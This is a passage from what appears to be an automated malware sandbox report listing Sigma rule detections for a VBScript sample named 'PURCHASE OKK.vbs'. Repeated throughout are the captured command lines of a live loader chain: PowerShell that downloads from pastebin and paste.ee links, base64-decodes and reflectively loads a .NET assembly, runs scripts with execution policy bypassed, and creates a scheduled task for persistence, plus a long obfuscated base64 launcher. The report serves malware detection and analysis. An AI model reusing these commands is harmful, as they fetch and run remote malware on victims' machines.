'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPower
                  Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?Ho?RgBL?GE?QQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?bgBh?EE?ZwBk?GM?V?BH?Cc?I??7?CQ?SQBl?H??RwBR?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?Ds?J?B3?GU?YgBD?Gw?aQBl?G4?d??g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?FI?VgBV?Fg?dg?g?D0?I??k?Hc?ZQBi?EM?b?Bp?GU?bgB0?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?Ho?RgBL?GE?QQ?g?Ck?I??7?CQ?UgBW?FU?W?B2?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BJ?GU?c?BH?FE?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?Cc?VQBU?EY?O??n?C??LQBm?G8?cgBj?GU?I??7?CQ?UwBU?GY?RwBs?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??y?C4?d?B4?HQ?Jw?p?C??Ow?k?F??a?By?Gw?Tg?g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?F??a?By?Gw?Tg?u?EU?bgBj?G8?Z?Bp?G4?Zw?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?V?Bl?Hg?d??u?EU?bgBj?G8?Z?Bp?G4?ZwBd?Do?OgBV?FQ?Rg?4?C??Ow?k?EQ?S?B6?FU?QQ?g?C??PQ?g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?Ek?ZQBw?Ec?UQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??PQ?g?CQ?U?Bo?HI?b?BO?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?EQ?S?B6?FU?QQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BT?FQ?ZgBH?Gw?I??t?GY?bwBy?GM?ZQ?g?Ds?J?BN?E8?R?BS?Gc?I??9?C??I??n?CQ?cgB5?GE?ZQBH?C??PQ?g?Cg?RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??Jw?n?Cc?I??r?C??J?BT?FQ?ZgBH?Gw?I??r?C??Jw?n?Cc?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?FU?V?BG?Dg?KQ?7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?EI?eQB0?GU?WwBd?F0?I??k?EY?eQBm?GQ?eg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?HI?eQBh?GU?Rw?u?HI?ZQBw?Gw?YQBj?GU?K??n?Cc?J??k?CQ?J??n?Cc?L??n?Cc?QQ?n?Cc?KQ?g?Ck?I??7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Cc?I??r?C??Jw?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?I??k?EY?eQBm?GQ?eg?g?Ck?Lg?n?C??Ow?k?E0?TwBE?FI?Zw?g?Cs?PQ?g?Cc?RwBl?HQ?V?B5?H??ZQ?o?C??Jw?n?E0?aQBz?GU?cgBp?GM?bwBy?GQ?aQBv?HM?bwBB?G0?ZQBu?C4?QwBs?GE?cwBz?DE?Jw?n?C??KQ?u?Ec?ZQB0?E0?Jw?g?Ds?J?BN?E8?R?BS?Gc?I??r?D0?I??n?GU?d?Bo?G8?Z??o?C??Jw?n?E0?cwBx?EI?SQBi?Fk?Jw?n?C??KQ?u?Ek?bgB2?G8?awBl?Cg?I??k?G4?dQBs?Gw?I??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?I??n?Cc?M??v?FQ?UgB4?E8?R?Ba?Dk?N??v?HI?LwBl?GU?LgBl?HQ?cwBh?H??Lw?v?Do?cwBw?HQ?d?Bo?Cc?Jw?g?Cw?I??n?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?Cc?I??s?C??Jw?n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?
                  Sigma detected: Script Interpreter Execution From Suspicious Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7916, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, ProcessId: 8040, ProcessName: powershell.exe
                  Sigma detected: Suspicious Script Execution From Temp Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7916, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, ProcessId: 8040, ProcessName: powershell.exe
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PURCHASE OKK.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PURCHASE OKK.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PURCHASE OKK.vbs", ProcessId: 7588, ProcessName: wscript.exe
                  Sigma detected: Change PowerShell Policies to an Insecure Level
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPower
                  Sigma detected: PowerShell Web Download
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPower
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\user\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\user\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PURCHASE OKK.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7588, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\user\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos, ProcessId: 7720, ProcessName: schtasks.exe
                  Sigma detected: Usage Of Web Request Commands And Cmdlets
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPower
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PURCHASE OKK.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PURCHASE OKK.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PURCHASE OKK.vbs", ProcessId: 7588, ProcessName: wscript.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?Ho?RgBL?GE?QQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?bgBh?EE?ZwBk?GM?V?BH?Cc?I??7?CQ?SQBl?H??RwBR?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?Ds?J?B3?GU?YgBD?Gw?aQBl?G4?d??g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?FI?VgBV?Fg?dg?g?D0?I??k?Hc?ZQBi?EM?b?Bp?GU?bgB0?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?Ho?RgBL?GE?QQ?g?Ck?I??7?CQ?UgBW?FU?W?B2?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BJ?GU?c?BH?FE?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?Cc?VQBU?EY?O??n?C??LQBm?G8?cgBj?GU?I??7?CQ?UwBU?GY?RwBs?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??y?C4?d?B4?HQ?Jw?p?C??Ow?k?F??a?By?Gw?Tg?g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?F??a?By?Gw?Tg?u?EU?bgBj?G8?Z?Bp?G4?Zw?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?V?Bl?Hg?d??u?EU?bgBj?G8?Z?Bp?G4?ZwBd?Do?OgBV?FQ?Rg?4?C??Ow?k?EQ?S?B6?FU?QQ?g?C??PQ?g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??